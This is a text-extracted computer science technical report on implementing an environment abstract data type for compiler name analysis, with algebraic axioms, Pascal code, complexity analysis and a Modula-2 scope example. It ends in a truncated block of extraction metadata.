Environments (1) and (2) are represented by the same $Environment$ value. The distinction is embodied in the environment abstract data type by preserving the hierarchical relationships among the $Environment$ values and providing two access operations. One of these access operations yields only the bindings in the scope corresponding to a specified $Environment$ value. That access function would be used to implement environment (1). The other access function, used to implement environment (2), yields the bindings in the scope corresponding to a specified $Environment$ value and any bindings from enclosing scopes (provided those bindings are not hidden).
Figure 2 $^4$ describes the behavior of the environment abstract data type in terms of $Identifier$ and $DefTableKey$. The scope hierarchy is conveyed to the ADT through use of $NewScope$, whose operand is the $Environment$ value for the scope enclosing the one being created. $KeyInScope$ makes available only the bindings whose scope is specified by its first operand, while $KeyInEnv$ makes available the bindings in that scope and all enclosing scopes. Note that the hiding is accomplished by searching the nest of scopes hierarchically, from smallest to largest, and returning the first binding found.
Both $KeyInScope$ and $KeyInEnv$ are total functions returning a single value of type $DefTableKey$. Some languages, for example Algol 68$^5$ and Ada,$^6$ allow an environment
---
**Signatures**
$NewEnv : \rightarrow Environment$
$NewScope : \rightarrow Environment$
$Add : \rightarrow Environment \times Identifier \times DefTableKey \rightarrow Environment$
$KeyInScope : \rightarrow DefTableKey$
$KeyInEnv : \rightarrow DefTableKey$
---
**Axioms**
(A1) $KeyInScope\ (NewEnv\ (), i) = NoKey$
(A2) $KeyInScope\ (NewScope\ (e), i) = NoKey$
(A3) $KeyInScope\ (Add\ (e, i_1, k), i_2) = \begin{cases} \text{if } i_1=i_2 \text{ then } k \text{ else } KeyInScope\ (e, i_2) \\ \end{cases}$
(A4) $KeyInEnv\ (NewEnv\ (), i) = NoKey$
(A5) $KeyInEnv\ (NewScope\ (e), i) = KeyInEnv\ (e, i)$
(A6) $KeyInEnv\ (Add\ (e, i_1, k), i_2) = \begin{cases} \text{if } i_1=i_2 \text{ then } k \text{ else } KeyInEnv\ (e, i_2) \\ \end{cases}$
---
**Figure 2**
Algebraic Specification of an Environment ADT
to contain more than one binding for an identifier. An identifier is *overloaded* in an environment if that environment contains more than one binding for the identifier. The key denoted by an overloaded identifier is determined by applying *overload resolution* rules to the set of bindings in the environment. We shall return to the question of overloading in Section 5, where we show how to handle overloaded identifiers with a standard environment module.
There are two situations in which a compiler would create a new *Environment* value by adding a binding:
1) An identifier definition has been imported from some other context. In this case, both the identifier and the key to which it is to be bound are known.
2) A new identifier definition has been encountered. In this case, the identifier is known but the compiler must obtain a new key from the *DefTableKey* ADT.
Regardless of which of these two situations arise, the compiler must deal with the possibility that a declaration for the identifier already exists in the current scope. Because these situations arise frequently, and because each is always handled in exactly the same way, it is convenient to augment the environment ADT with explicit operations to handle them (Figure 3).
If there is no binding for \( i \) in the current scope \( e \), then each of the operations described by Figure 3 introduces one. *AddI dn*, which would be used in situation (1), binds \( i \) to the key \( k \). *DefineI dn* binds \( i \) to a new key that it obtains by invoking the
---
**Signatures**
\[
\begin{align*}
\text{AddI dn} &: \quad \text{Environment} \times \text{Identifier} \times \text{DefTableKey} \rightarrow \text{Boolean} \times \text{Environment} \\
\text{DefineI dn} &: \quad \text{Environment} \times \text{Identifier} \rightarrow \text{DefTableKey} \times \text{Environment}
\end{align*}
\]
**Axioms**
\[
\begin{align*}
\text{(A7)} \quad \text{AddI dn} (e, i, k) &= \quad \text{if } \text{KeyInScope} (e, i) = \text{NoKey} \\
& \quad \text{then} (\text{true}, \text{Add} (e, i, k)) \\
& \quad \text{else} (\text{false}, e) \\
\text{(A8)} \quad \text{DefineI dn} (e, i) &= \quad \text{if } \text{KeyInScope} (e, i) = \text{NoKey} \\
& \quad \text{then} (k, \text{Add} (e, i, k)) \text{ where } k = \text{NewKey} \\
& \quad \text{else} (\text{KeyInScope} (e, i), e)
\end{align*}
\]
---
**Figure 3**
Operations to Introduce Bindings
NewKey operation of the DefTableKey abstract data type. The new key is returned so that the compiler can set its properties. Since the key supplied to AddIdn has presumably already had properties set, AddIdn simply returns true to indicate that the definition was allowed.
If the current scope e already contains a binding for i, AddIdn reports that fact by returning false. DefineIdn, on the other hand, conceptually maps all definitions of the same identifier in one scope to the same key. Hence the situation in which an identifier is multiply defined has to be indicated by a property associated with that key. In any event, only the first definition of an identifier in a scope is retained; later definitions of that identifier are ignored.
Figure 4 shows how the environment ADT might be used to perform name analysis. Identifier values are denoted by the identifiers themselves in Figure 4, DefTableKey values by \( k_n \) and Environment values by \( e_n \). The invocations of ADT operations are written next to the constructs with which they are associated. Thus the compiler must execute a DefineIdn operation for the construct in the first line of each program.
The operations invoked in Figures 4a and 4b are identical, but their arguments differ because of the differing scope rules of C and Pascal. In C, a definition is valid from the point of definition to the end of the compound statement containing that definition, while in Pascal a definition is valid throughout the block containing that definition. This difference in scope rules is manifested in the Environment argument of the KeyInEnv invocation for i in the definition of m in each figure. In Figure 4a, \( e_5 \) is used and in Figure 4b \( e_6 \) is used. The difference between these two values is that \( e_5 \) contains only the bindings that textually precede the use of i in the declaration of \( m \), whereas \( e_6 \) contains all of the bindings in the entire block.
Note that the order of the invocations of the ADT operations in Figure 4 is determined by the dependences among them, not by the order in which they are written down. All of the DefineIdn invocations in Figure 4b must be executed before any of the KeyInEnv invocations, because the latter require \( e_6 \) as an argument.
Figure 4b contains an error, because the use of i in the declaration of m precedes its declaration in the following line. The Pascal Standard prohibits use of an identifier before its declaration in all cases except the declaration of a pointer type. Many Pascal compilers do not detect this error: The dependences among the operations in Figure 4b imply that the compiler must visit all identifier definitions in a block before visiting any identifier uses. A compiler that is designed to make exactly one pass, in textual order, over the source program will not be able to satisfy the dependences of Figure 4b without retaining a representation of the entire tree in memory. (There is a way to use the name analysis strategy of Figure 4a for Pascal, keeping additional properties to detect the use-before-definition error.)
A straightforward implementation of the environment ADT uses a single record for each invocation of NewScope and Add. Each Environment value is a pointer to one of these records. The record corresponding to an operator invocation simply contains all of the arguments of that invocation. Since Environment values are pointers, this means that the records form singly linked lists that can be searched recursively by procedures that
int i = 10;
P()
{
int m = i;
int i = 20;
printf("%d %d\n", m, i);
}
a) According to the scope rules of C
const i = 10;
procedure P;
{
const m = i;
i = 20;
begin
writeln(m, i);
end;
}
a) According to the scope rules of Pascal
Figure 4
Name Analysis Using the ADT of Figure 3
exactly implement the axioms A1-A6 of Figure 2.
Each operation except NewScope has a worst case time complexity of $O(N)$ in
this implementation, where $N$ is the number of identifier declarations in the program.
Since the total number of identifier occurrences is proportional to the number of identifier
declarations, and some operation with time complexity $O(N)$ must be invoked for every
identifier occurrence (AddIdn or DefineIdn for definitions, KeyInEnv or KeyInScope for
uses), the asymptotic time complexity of name analysis as a whole will be \( O(N^2) \). The asymptotic storage requirement is \( O(N) \) because there is one fixed-length record for each identifier definition (records corresponding to NewScope operations could be eliminated by adding two flags to the records corresponding to Add operations).
Another possible implementation uses an array of records, indexed by Identifier values, for each Environment value. Each record contains a DefTableKey value (possibly NoKey) specifying the binding of its index, and a Boolean value that is true if and only if the binding occurred in the scope represented by the array. KeyInEnv and KeyInScope are constant time operations in this implementation. Unfortunately the asymptotic space complexity is \( O(N^2) \), and the total time complexity for name analysis remains \( O(N^2) \): Both NewScope and Add must create new arrays, copying the contents of their Environment arguments and setting the flags properly. Thus each of these operations has time complexity \( O(N) \), and the number that must be executed is proportional to \( N \).
3. A State Model for the Environment ADT
The algebraic specification of the environment ADT given in the previous section has a strict value semantics. Each application of a constructor function (NewEnv, NewScope, Add) yields a new Environment value that exists from that time forward. Figure 4 shows, however, that each of these values has a specific "useful lifetime": the portion of the execution history of the name analysis between the time the value is created and the time it is last used. This suggests that the definitions of the previous section overspecify the environment ADT, and that by making a specification that is more precise in terms of the lifetimes of Environment values we might be able to reduce the cost of name analysis.
The useful lifetime of an Environment value depends upon the name analysis strategy used by the compiler, which in turn depends on the scope rules of the source language. Figure 4 illustrated the effect of the essential difference in scope rules: For some languages the scope of a definition begins at the defining point and continues to the end of a region (C-like scope rules); for others the scope of a definition is the entire region in which it is declared (Pascal-like scope rules). A compiler for a language with C-like scope rules might carry out its name analysis task during a single text-order traversal of the source program, as illustrated by Figure 4a. Compilers for languages with Pascal-like scope rules, on the other hand, might traverse every region of the program twice. During the first traversal they would invoke AddIdn or DefnIdn at every definition and ignore all nested regions. The second traversal would invoke KeyInEnv or KeyInScope at every use of an identifier, and would perform both traversals of each nested region. (This strategy is compatible with the value dependence of Figure 4b. We have already pointed out the existence of strategies that retain additional information in order to avoid two traversals when compiling Pascal.)
Now consider the effect of these strategies on the useful lifetimes of the Environment values generated by the environment ADT described in the previous section. NewEnv will be invoked at the beginning of the compilation, and NewScope will be invoked at the beginning of the traversal of each nested region. KeyInEnv or KeyInScope will be invoked at each use of an identifier. Clients of the abstract data type never
invoke Add directly; they add bindings by invoking either AddIdn or DefineIdn when a definition is encountered. It is easy to show that if an Environment value is used by either AddIdn or DefineIdn, that value will never be used again by either of the strategies discussed in the previous paragraph. We will therefore assume that AddIdn and DefineIdn do not return new Environment values, but instead alter the state of their Environment argument by adding a binding to the set it represents. (Of course these operations will have no effect on the state if a binding for their Identifier argument is already present in their Environment argument.) An Environment value's state is nothing but the set of bindings it represents. Thus the environment of a program point is actually the state of some Environment value.
Figure 5 shows the consequences of this state model for the examples of Figure 4. Notice that it is no longer possible to determine the order of the invocations from dependences among them. The compiler designer must explicitly take the state of the Environment value into account when deciding upon the correct invocation sequence. In Figure 5a the invocation of KeyInEnv for i in the line defining m must precede the invocation of DefineIdn for i in the following line because the latter operation will change the state of e_2. Similarly, the invocation of KeyInEnv for i in the line defining m in Figure 5b must follow the invocation of DefineIdn for i in the following line because only after the latter operation has the proper state of e_2 been established.
Let us now consider an implementation of the state model using an array of fixed-size records to implement each Environment value. The state of the value defines the content of the array. Each NewEnv and NewScope operation has time complexity O(N), because it must create a new array and either initialize the contents (NewEnv) or copy the content of another array (NewScope). All other operations, however, require only constant time. DefineIdn and AddIdn check a single array element and possibly alter its content; KeyInScope and KeyInEnv simply access the element. The overall time and space complexity of name analysis are therefore reduced to O(N \times S), where N is the number of identifier occurrences and S is the number of distinct regions of the program in which identifiers are declared.
4. A Standard Environment Module
This section presents an implementation of a standard environment module that supports name analysis in a wide range of compilers. It realizes the state model of the environment ADT described in the previous section. The basic approach is to use a single array of lists of fixed-size records to simulate the implementation discussed at the end of the previous section. For practical situations both the time and space complexity of name analysis using this module are O(N). We first give the details of the module and then analyze its performance.
Figure 6a gives a Pascal definition of the data types manipulated by the module, and Figure 6b illustrates the state of the data structure in a Pascal compiler during the processing of line 12 of Figure 1. (Space limitations only permit us to show three of the StkElts; there are actually many more.) The dotted rectangle at the right of Figure 6b is the AccessMechanism record, which contains the array and a pointer to the record representing the Environment value currently encoded in that array. If the Environment
int i = 10;
P()
{
int m = i;
int i = 20;
printf("%d %d\n", m, i);
}
a) According to the scope rules of C
const i = 10;
procedure P;
const m = i;
i = 20;
begin
writeln(m, i);
end;
a) According to the scope rules of Pascal
Figure 5
Name Analysis Using A State Model
type
Environment = \uparrow \text{EnvImpl}; (* Set of Identifier/Definition pairs *)
Scope = \uparrow \text{RelElt}; (* Single region *)
Access = \uparrow \text{AccessMechanism}; (* Current access state *)
EnvImpl = record
nested: Access; (* Constant-time access to identifier definitions *)
parent: Environment; (* Enclosing environment *)
relate: Scope; (* Current region *)
end;
RelElt = record
idn: Identifier; (* Identifier *)
nxt: Scope; (* Next identifier/definition pair for the current region *)
key: DefTableKey; (* Definition *)
end;
SikPtr = \uparrow \text{SikElt}; (* List implementing a definition stack *)
SikElt = record
out: SikPtr; (* Superseded definitions *)
key: DefTableKey; (* Definition *)
e: Environment; (* Environment containing this definition *)
end;
AccessMechanism = record
IdnTbl = array
[0..MaxIdn] of SikPtr; (* Current state of the access mechanism *)
CurrEnv : Environment; (* Stacks of definitions *)
end;
(a) Data objects for the constant-time access function

Definitions of pre-defined identifiers
- Definitions
- with statement body
(b) The data structure during the analysis of line 12, Figure 1
Figure 6
The Data Structure of the Standard Environment Module
value passed to one of the module’s operations is equal to the value specified by this pointer, then the operation is carried out immediately. Otherwise, the contents of the array may be adjusted to reflect the Environment value passed.
The nested field of the EnvImpl record reflects the actual scope nesting, relative to the scope represented by the EnvImpl record. If the scope pointed to by the CurrEnv field of the AccessMechanism is either the scope represented by the EnvImpl record or a scope nested within that scope, then the nested field contains a pointer to the AccessMechanism. Otherwise the nested field contains nil. It is easy to see that definitions for an environment are on the “identifier stacks” addressed by IdnTbl elements if and only if the nested field of its EnvImpl record points to the AccessMechanism. In Figure 6b, CurrEnv is pointing to the EnvImpl record for the with statement body, which is the environment appropriate for line 12 of Figure 1. The identifiers defined in the with statement, the identifiers defined in the program block, and the predefined identifiers are on the identifier stacks. Therefore the nested fields of the EnvImpl records corresponding to those three regions point to the access mechanism. The nested field of the EnvImpl record corresponding to the body of the record declared on line 3 of Figure 1 is nil because the field identifiers are not on the identifier stacks.
Figure 7 gives Pascal code that implements the environment access functions DefineIdn and KeyInEnv. Both begin by making certain that the array reflects the situation in the environment specified by the Environment argument. SetEnv, EnterEnv and LeaveEnv are all private procedures of the environment module. They are used to set up the array so that it reflects a given environment, and are only invoked if some sort of change is necessary.
EnterEnv assumes that the array reflects the parent of the environment to be entered. It scans that environment, pushing a new definition onto the stack for each identifier in the environment. LeaveEnv reverses this operation, removing the top definition from the stack for each identifier in the current environment and thus restoring the array to reflect the parent of the current environment. SetEnv decides on a sequence of leave and enter operations that will make the array reflect the desired environment. If definitions for the desired environment are on the identifier stacks, but the desired environment is not the current one, SetEnv simply leaves environments until the desired environment is reached. Otherwise, SetEnv sets the environment to the parent of the desired one and then enters the desired environment.
What is the time complexity of the implementation shown in Figure 7? Clearly DefineIdn and KeyInEnv are O(1) if the array reflects the Environment argument. In order to account for the time required to maintain the array’s state, we need to examine the global behavior of the name analyzer. The fundamental question that must be answered is “How often is a particular region considered during name analysis?”
Figure 7 will support a name analyzer that shifts its attention arbitrarily among regions. If each node in the tree is visited a fixed number of times, independent of the size of the program, the tree traversal can only enter a particular region a fixed number of times. If the name analyzer only shifts its attention from one region to another when the tree traversal actually moves from one region to another, then EnterEnv and LeaveEnv will only be executed a fixed number of times for each region. Both EnterEnv and
procedure EnterEnv (e : Environment);
(* Make the state of the array reflect e
On entry:
The state of the array reflects the parent of e *)
var r : Scope; s : StkPtr;
begin r := r → relate;
with e → parent → nested → do begin
while r <> nil do begin
new (s); s → e := e; s → key := r → key; s → out := IdnTbl [r → idn]; IdnTbl [r → idn] := s; r := r → nxt; end;
CurrEnv := e;
end;
end;
procedure LeaveEnv (e : Environment);
(* Make the state of the array reflect the parent of e
On entry:
The state of the array reflects e *)
var r : Scope; s : StkPtr;
begin r := e → relate;
with e → nested → do begin
while r <> nil do begin
s := IdnTbl [r → idn]; IdnTbl [r → idn] := s → out; dispose (s); r := r → nxt end;
CurrEnv := e → parent;
end;
end;
procedure SetEnv (e : Environment);
(* Make the state of the array reflect e *)
begin
if e = nil then Report (DEADLY, 1004 (*Invalid environment*), NoPosition, 1);
if e → nested = nil then begin SetEnv (e → parent); EnterEnv (e) end
else with e → nested → do repeat LeaveEnv (CurrEnv) until CurrEnv = e;
end;
function KeyInEnv (e : Environment; idn : Identifier) : DefTableKey;
begin
with e → nested → do begin
if e < CurrEnv then SetEnv (e);
if IdnTbl [idn] = nil then KeyInEnv := NoKey else KeyInEnv := IdnTbl [idn] → key;
end;
end;
function DefineIdn (e : Environment; idn : Identifier) : DefTableKey;
var found : boolean; p : DefTableKey; r : Scope; s : StkPtr;
begin
with e → nested → do begin
if e < CurrEnv then SetEnv (e);
if IdnTbl [idn] = nil then found := false else found := IdnTbl [idn] → e = e;
if found then DefineIdn := IdnTbl [idn] → key
else begin
p := NewKey;
new (r); r → idn := idn; r → key := p; r → nxt := r → rng; e → rng := r;
new (s); s → e := e; s → key := p; s → out := IdnTbl [idn]; IdnTbl [idn] := s;
DefineIdn := p;
end;
end;
end;
Figure 7
Environment Access Operations
LeaveEnv execute a constant number of basic operations for each element of the region’s relate list, which has one entry for each defining occurrence in the region.
Consider a particular region, R. Suppose that R is entered and left T times. Each time the region is entered, E basic operations are executed for each element of R.relate (Figure 6a); each time it is left, L operations are executed for each element of R.relate. Therefore the total number of basic operations executed during the entire compilation for each element of R.relate would be T × (E + L). We can therefore “charge” each defining occurrence in R the time required to execute T × (E + L) basic operations. This shows that we can ignore the costs of EnterEnv and LeaveEnv, because their only effect is to increase the cost of DefineIdn by a constant amount.
All of the operations of the environment module except KeyInScope and NewEnv are O(1) in the worst case when implemented as shown in Figure 7. KeyInScope would also be O(1) if the compiler entered the appropriate region before KeyInScope was applied. Then all that would be needed would be to verify that the association at the top of the stack was defined in that region, just as DefineIdn does. Taking this approach, however, would mean that applied occurrences of field identifiers in Pascal constructs like R.B would require the name analyzer to shift its consideration from the current region to the region of a record definition and then immediately shift it back again. Although Figure 7 is quite capable of doing this, it violates our assumption that the number of times the name analyzer shifts its attention to a given region is independent of the program size. Thus it makes the cost of EnterEnv and LeaveEnv impossible to ignore.
In order to salvage our earlier analysis, we must charge the cost of an EnterEnv operation followed by a LeaveEnv operation to the invocation of KeyInScope that processes R.B. But since that cost is proportional to the number of fields in R, and the cost of KeyInScope implemented as a linear search is also proportional to the number of fields in R, nothing has been gained. Since the search operation is simpler than EnterEnv followed by LeaveEnv, KeyInScope should not use the array access mechanism.
For most programs, field references like R.B are a small fraction of the total number of identifier occurrences. Moreover, the number of fields in a record does not usually grow with overall program size. We can conclude that the implementation of Figure 7 gives essentially O(1) complexity for every operation of the environment module except NewEnv. Since NewEnv is O(N) and is executed once, and the other operations are O(1) and executed O(N) times, the actual growth of the name analysis time with program size is O(N). This contrasts with the O(N^2) growth for the implementation of Section 2.
5. Additional Environment Access Operations
The data structure of Figure 6 provides easy access to information beyond that needed to simply map identifiers into keys. For example, to process the with statement that accesses a record, a Pascal compiler needs access to a list of all of the fields defined for records of that type. It must create a “pseudo-variable” corresponding to each field. The address of the pseudo-variable is the sum of the address of the record accessed by
the `with` statement and the relative address of the field within that record, and the type of
the pseudo-variable is the type of the field. Since every record type is a region containing
definitions of all of the fields, such a list must be a component of the standard
environment's data structure.
When resolving overloading in Algol68 or Ada, the compiler needs to consider
hidden bindings for the overloaded identifiers. Again, the data structure for the standard
environment has these lists. By defining additional operations, we can make these lists
available at very little cost. It is important to note, however, that the additional operations
do not form a part of the environment abstract data type and may not be easy to pro-
vide with other implementations.
In each case, strict value semantics are appropriate for the operations. One oper-
ation returns the desired list, given the `Environment` (or `Environment × Identifier`) value on
which that list is based. Other operations accept a list of the proper type and yield the
information contained in its first element. Finally, an operation accepts a list of the
proper type and returns that list with the first element deleted. Figure 8 defines the nec-
sessary operations with their signatures. (`Scope` and `StkPtr` are defined in Figure 6a.)
Implementation of the operations of Figure 8 is trivial, provided that we can
guarantee that the lists on which they operate will not be altered during their operation.
This is a reasonable restriction to impose upon the user, given the tasks for which the
operations are intended. The restriction could be checked by the module, but such check-
ing is probably not worthwhile.
6. A More Complex Example
The name analysis examples of Figure 5 illustrate the basic use of the standard
environment module. In this section we show an additional example that illustrates how
so-called “explicit scope control” is handled. It turns out that some care must be taken
<table>
<thead>
<tr>
<th>DefinitionsOf :</th>
<th>Environment</th>
<th>→</th>
<th>Scope</th>
</tr>
</thead>
<tbody>
<tr>
<td>IdnOf</td>
<td>Scope</td>
<td>→</td>
<td>Identifier</td>
</tr>
<tr>
<td>KeyOf</td>
<td>Scope</td>
<td>→</td>
<td>DefTableKey</td>
</tr>
<tr>
<td>NextDefinition :</td>
<td>Scope</td>
<td>→</td>
<td>Scope</td>
</tr>
<tr>
<td>HiddenBy</td>
<td>Environment × Identifier</td>
<td>→</td>
<td>StkPtr</td>
</tr>
<tr>
<td>HiddenKey</td>
<td>StkPtr</td>
<td>→</td>
<td>DefTableKey</td>
</tr>
<tr>
<td>NextHidden</td>
<td>StkPtr</td>
<td>→</td>
<td>StkPtr</td>
</tr>
</tbody>
</table>
Figure 8
Useful Auxiliary Operations
to preserve the $O(N)$ time bound when processing languages with this form of visibility rules.
Figure 9 shows a program fragment written in Modula2. Each of the comments could be replaced by a sequence of statements, and the variables indicated in the comments would be visible in those statements. “Standard identifiers”, like \texttt{CARDINAL}, are visible everywhere.
The construct \texttt{"MODULE X \cdots END X;"} is called a module declaration. A module declaration explicitly controls the visibility of identifiers. Identifiers declared outside a module declaration are not visible inside it unless they are standard identifiers or they have been named in an import list. Identifiers declared inside a module declaration can be made visible outside it if they are included in an export list.
Modula2 also provides procedure declarations, in which the normal Pascal scope rules apply. Thus the name analysis task of a Modula2 compiler builds and uses environments in much the same way as the name analysis task of a Pascal compiler. A module declaration appearing in a region of a program acts as like a sequence of identifier declarations and uses. The name of the module and the identifiers in the export list are all declared by the module declaration, and the identifiers in the import list are used. This effect of the module declaration involves no new concepts, and can be handled by the techniques discussed earlier in this paper.
A module declaration also has the effect of creating a new scope that is a child of the root of the environment module’s tree of scopes (see Figure 6b). Identifiers are defined within a scope created by a module declaration in three ways:
```plaintext
VAR a,b: CARDINAL;
MODULE M;
IMPORT a; EXPORT w,x;
VAR u,v,w: CARDINAL;
MODULE N;
IMPORT u; EXPORT x,y;
VAR x,y,z: CARDINAL;
(* u,x,y,z are visible here *)
END N;
(* a,u,v,w,x,y are visible here *)
END M;
(* a,b,w,x are visible here *)
```
Figure 9
A Modula2 Program
1) They appear in an import list of the module declaration. Identifier \( u \) is introduced into module \( N \) in this way (Figure 9).
2) They appear in the export list of a module declared immediately within the module declaration. Identifier \( y \) is introduced into module \( M \) in this way (Figure 9). Note that identifier \( y \) is not introduced into the main program because the module \( N \) is not declared immediately within the main program.
3) They are defined by a declaration immediately within the module declaration. Identifier \( v \) is introduced into module \( M \) in this way (Figure 9).
How can we implement these rules using our standard environment module?
For simplicity, we shall assume that the compiler builds a tree that represents the source program. The shape of the tree is determined by the abstract syntax\(^1\) of Modula2. This means, in particular, that each module declaration is represented by a subtree. In the tree representing Figure 9, module \( M \) is represented by a subtree of the program tree and module \( N \) is represented by a subtree of the module \( M \) tree. The compiler traverses the source program tree, visiting nodes and performing computations. Each visit to a specific kind of node is handled by a single visit procedure. This visit procedure may perform computations and visit children of its node by invoking the appropriate visit procedures. Ultimately, the visit terminates when the visit procedure returns.
To implement the Modula2 scope rules, we associate two visit procedures with module declarations and two with procedure declarations. Figure 10 gives the interface specifications for the procedures that carry out the first visit, and sketches their algorithms. The effect of these procedures is to traverse the tree depth-first, processing the identifier declarations that occur at the top level in every module. According to the interface specification, this makes the export list of each module accessible via that module’s node as a list of (identifier, key) pairs.
It is important to note the difference between visiting a construct and entering the environment associated with a construct. The routines of Figure 10 visit every procedure and module in the program. Only ModuleVisit \( 1 \) executes any operations of the environment abstract data type. AddIdn verifies that the current environment is the one specified by its Environment argument, as shown in Figure 7 for DefineIdn. If the current environment is not the desired one, then AddIdn invokes SetEnv to enter it. Thus the visit procedures of Figure 10 create an environment for every module and enter that environment to define the identifiers declared within it. Note that environment values are not created for procedures during these visits.
The procedures that carry out the second visit of each module and procedure are shown in Figure 11. A module visit begins by defining all of the imported identifiers, which are stored (with the appropriate keys) in a list attached to the module’s node. This action causes the module’s environment to be entered if it is not already current. Then the import lists of all immediately-nested modules are constructed. Since each identifier on an import list of an immediately-nested module is defined in the environment of the current module, no change of environment is required. Next, all of the identifier uses in the module’s environment are processed. No change of environment is implied by this processing either.
procedure ModuleVisit 1(node : TreePtr);
(* First visit to a source program tree node representing a local module
On exit-
node ↑.ExportList = A list of (identifier,key) pairs defining the exported bindings *)
begin
for n:=(* each immediately-nested module declaration *) do ModuleVisit 1(n);
for n:=(* each immediately-nested module procedure *) do ProcVisit 1(n);
node ↑.Env := NewScope (StandardEnvironment);
for n:=(* each immediately-nested module declaration *) do
for (i,k) in n ↑.ExportList do
if not AddIdn (node ↑.Env,i,k) then (* Report an error *);
(* Process all identifier declarations *)
node ↑.ExportList := nil;
for i:=(* each identifier on an export list *) do
node ↑.ExportList := (i, KeyInEnv (node ↑.Env,i)), node ↑.ExportList;
end;
procedure ProcVisit 1(node : TreePtr);
(* First visit to a source program tree node representing a procedure
On exit-
ModuleVisit 1 has been applied to all local modules *)
begin
for n:=(* each immediately-nested module declaration *) do ModuleVisit 1(n);
for n:=(* each immediately-nested module procedure *) do ProcVisit 1(n);
end;
Figure 10
Beginning the Name Analysis for Modula2
procedure ModuleVisit2(node : TreePtr);
(* Second visit to a source program tree node representing a local module
On entry-
node ↑.ImportList=A list of (identifier,key) pairs defining the imported bindings *)
begin
for (i,k) in node ↑.ImportList do
if not AddIdn (node ↑.Env,i,k) then (* Report an error *);
for n :=(* each immediately-nested module declaration *) do
begin n ↑.ImportList:=nil;
for i :=(* each identifier on an export list *) do
n ↑.ImportList:=(i , KeyInEnv (node ↑.Env,i)) , n ↑.ImportList;
end;
(* Process all identifier uses *)
for n :=(* each immediately-nested module procedure *) do ProcVisit2(n);
for n :=(* each immediately-nested module declaration *) do ModuleVisit2(n);
end;
procedure ProcVisit2(node : TreePtr);
(* First visit to a source program tree node representing a procedure
On exit-
ModuleVisit2 has been applied to all local modules *)
begin
node ↑.Env := NewScope (/*enclosing environment*/);
for n :=(* each immediately-nested module declaration *) do
for (i,k) in n ↑.ExportList do
if not AddIdn (node ↑.Env,i,k) then (* Report an error *);
(* Process all identifier declarations *)
(* Process all identifier uses *)
for n :=(* each immediately-nested module declaration *) do
begin n ↑.ImportList:=nil;
for i :=(* each identifier on an export list *) do
n ↑.ImportList:=(i , KeyInEnv (node ↑.Env,i)) , n ↑.ImportList;
end;
for n :=(* each immediately-nested module procedure *) do ProcVisit2(n);
for n :=(* each immediately-nested module declaration *) do ModuleVisit2(n);
end;
Figure 11
Continuing the Modula2 Name Analysis
When an immediately-nested procedure is visited, ProcVisit2 uses NewScope to create the environment for that procedure. It then defines the identifiers exported by modules immediately contained within that procedure in the procedure’s environment. This causes the procedure’s environment to be entered. After processing all of the identifier declarations of the procedure, ProcVisit2 processes the identifier uses and constructs import lists for the immediately-nested modules. None of these operations alter the current environment.
After all of the identifiers that are not included in nested procedures or modules have been processed, there is no need to remain within or return to the environment of the current procedure. Thus if that environment is left, it will never be re-entered. ProcVisit2 now applies itself to each immediately-nested procedure. It creates environments for those procedures, populates them with definitions, and looks up identifier uses within them. Each environment is created and then entered exactly once. Only after all identifier occurrences in a given scope have been dealt with does ProcVisit2 move on to another scope. Finally, ProcVisit2 invokes ModuleVisit2 for each immediately-nested module.
It is easy to see that Figures 10 and 11 enter each module’s environment twice (once in ModuleVisit1 and once in ModuleVisit2) and each procedure’s environment once (in ProcVisit2). Thus the complexity analysis of Section 4 holds, and Modula2 name analysis is \( O(N) \).
The constraint of a fixed number of environment entries and exits can be met with visit sequences other than those implied by Figures 10 and 11. For example, in ModuleVisit1 the for statements on the first two lines could be combined into a single traversal that visited all immediately-nested modules and procedures in textual order. When making such simplifications, however, it is important to verify that the constraint is, in fact, met: If we were to combine the for statements on the last two lines of ProcVisit2 into a single traversal that visited all immediately-nested modules and procedures in textual order then the constraint would be violated!
References
|
{"Source-Url": "http://www.cs.colorado.edu/department/publications/reports/docs/CU-CS-460-90.pdf", "len_cl100k_base": 10949, "olmocr-version": "0.1.53", "pdf-total-pages": 25, "total-fallback-pages": 0, "total-input-tokens": 28575, "total-output-tokens": 12554, "length": "2e13", "weborganizer": {"__label__adult": 0.0002968311309814453, "__label__art_design": 0.00026917457580566406, "__label__crime_law": 0.00023508071899414065, "__label__education_jobs": 0.00037789344787597656, "__label__entertainment": 4.583597183227539e-05, "__label__fashion_beauty": 0.0001195073127746582, "__label__finance_business": 0.00014829635620117188, "__label__food_dining": 0.0002923011779785156, "__label__games": 0.0005459785461425781, "__label__hardware": 0.0008730888366699219, "__label__health": 0.0003216266632080078, "__label__history": 0.00017702579498291016, "__label__home_hobbies": 6.67572021484375e-05, "__label__industrial": 0.0003139972686767578, "__label__literature": 0.00019669532775878904, "__label__politics": 0.0002310276031494141, "__label__religion": 0.0004742145538330078, "__label__science_tech": 0.009246826171875, "__label__social_life": 4.851818084716797e-05, "__label__software": 0.004169464111328125, "__label__software_dev": 0.98095703125, "__label__sports_fitness": 0.0002267360687255859, "__label__transportation": 0.0003786087036132813, "__label__travel": 0.0001544952392578125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49658, 0.01756]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49658, 0.66935]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49658, 0.87318]], "google_gemma-3-12b-it_contains_pii": [[0, 78, false], [78, 289, null], [289, 840, null], [840, 840, null], [840, 2677, null], [2677, 5562, null], [5562, 8817, null], [8817, 11161, null], [11161, 13581, null], [13581, 17123, null], [17123, 17915, null], [17915, 21480, null], [21480, 24967, null], [24967, 25256, null], [25256, 26512, null], [26512, 30148, null], [30148, 32097, null], [32097, 35460, null], [35460, 38063, null], [38063, 40034, null], [40034, 43554, null], [43554, 44710, null], [44710, 46313, null], [46313, 49304, null], [49304, 49658, null]], "google_gemma-3-12b-it_is_public_document": [[0, 78, true], [78, 289, null], [289, 840, null], [840, 840, null], [840, 2677, null], [2677, 5562, null], [5562, 8817, null], [8817, 11161, null], [11161, 13581, null], [13581, 17123, null], [17123, 17915, null], [17915, 21480, null], [21480, 24967, null], [24967, 25256, null], [25256, 26512, null], [26512, 30148, null], [30148, 32097, null], [32097, 35460, null], [35460, 38063, null], [38063, 40034, null], [40034, 43554, null], [43554, 44710, null], [44710, 46313, null], [46313, 49304, null], [49304, 49658, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49658, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 